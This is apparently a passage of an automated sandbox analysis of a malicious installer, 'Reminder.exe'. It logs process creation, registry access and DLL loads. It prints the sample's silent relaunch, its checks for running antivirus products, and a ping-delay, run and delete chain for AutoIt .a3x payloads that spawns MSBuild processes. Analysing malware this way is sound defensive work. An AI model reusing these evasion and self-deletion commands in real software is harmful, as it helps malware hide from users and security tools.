Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\edgheaa\AutoIt3.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\edgheaa\AutoIt3.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'WRSA.EXE'
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'OPSSVC.EXE'
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVASTUI.EXE'
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVGUI.EXE'
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'NSWSCSVC.EXE'
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'SOPHOSHEALTH.EXE'

Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Reminder.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization

Jump to behavior

Source: MSBuild.exe	String found in binary or memory: " /add /y
Source: MSBuild.exe	String found in binary or memory: " /add

Source: C:\Users\user\Desktop\Reminder.exe

File read: C:\Users\user\Desktop\Reminder.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Reminder.exe "C:\Users\user\Desktop\Reminder.exe"
Source: C:\Users\user\Desktop\Reminder.exe	Process created: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp "C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp" /SL5="$20434,1768989,845824,C:\Users\user\Desktop\Reminder.exe"
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp	Process created: C:\Users\user\Desktop\Reminder.exe "C:\Users\user\Desktop\Reminder.exe" /VERYSILENT
Source: C:\Users\user\Desktop\Reminder.exe	Process created: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp "C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp" /SL5="$20442,1768989,845824,C:\Users\user\Desktop\Reminder.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH \| find /I "wrsa.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "wrsa.exe"
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH \| find /I "opssvc.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "opssvc.exe"
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH \| find /I "avastui.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "avastui.exe"
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH \| find /I "avgui.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "avgui.exe"
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH \| find /I "nswscsvc.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH \| find /I "sophoshealth.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp	Process created: C:\Users\user\AppData\Local\friend\Updater.exe "C:\Users\user\AppData\Local\friend\\Updater.exe" "C:\Users\user\AppData\Local\friend\\yeorling.csv"
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ping -n 5 127.0.0.1 >nul && updater.exe C:\ProgramData\\huv9LF4.a3x && del C:\ProgramData\\huv9LF4.a3x
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\friend\Updater.exe updater.exe C:\ProgramData\\huv9LF4.a3x
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: unknown	Process created: C:\edgheaa\AutoIt3.exe "C:\edgheaa\AutoIt3.exe" C:\edgheaa\fkccfcd.a3x
Source: C:\edgheaa\AutoIt3.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\edgheaa\AutoIt3.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\edgheaa\AutoIt3.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: unknown	Process created: C:\edgheaa\AutoIt3.exe "C:\edgheaa\AutoIt3.exe" C:\edgheaa\fkccfcd.a3x
Source: C:\edgheaa\AutoIt3.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\edgheaa\AutoIt3.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Users\user\Desktop\Reminder.exe	Process created: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp "C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp" /SL5="$20434,1768989,845824,C:\Users\user\Desktop\Reminder.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp	Process created: C:\Users\user\Desktop\Reminder.exe "C:\Users\user\Desktop\Reminder.exe" /VERYSILENT	Jump to behavior
Source: C:\Users\user\Desktop\Reminder.exe	Process created: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp "C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp" /SL5="$20442,1768989,845824,C:\Users\user\Desktop\Reminder.exe" /VERYSILENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH \| find /I "wrsa.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH \| find /I "opssvc.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH \| find /I "avastui.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH \| find /I "avgui.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH \| find /I "nswscsvc.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH \| find /I "sophoshealth.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp	Process created: C:\Users\user\AppData\Local\friend\Updater.exe "C:\Users\user\AppData\Local\friend\\Updater.exe" "C:\Users\user\AppData\Local\friend\\yeorling.csv"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "wrsa.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "opssvc.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "avastui.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "avgui.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ping -n 5 127.0.0.1 >nul && updater.exe C:\ProgramData\\huv9LF4.a3x && del C:\ProgramData\\huv9LF4.a3x	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\friend\Updater.exe updater.exe C:\ProgramData\\huv9LF4.a3x	Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Jump to behavior
Source: C:\edgheaa\AutoIt3.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Jump to behavior
Source: C:\edgheaa\AutoIt3.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Jump to behavior
Source: C:\edgheaa\AutoIt3.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Jump to behavior
Source: C:\edgheaa\AutoIt3.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Jump to behavior
Source: C:\edgheaa\AutoIt3.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Jump to behavior

Source: C:\Users\user\Desktop\Reminder.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Reminder.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Reminder.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Reminder.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\find.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\find.exe	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\find.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\find.exe	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\find.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\find.exe	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
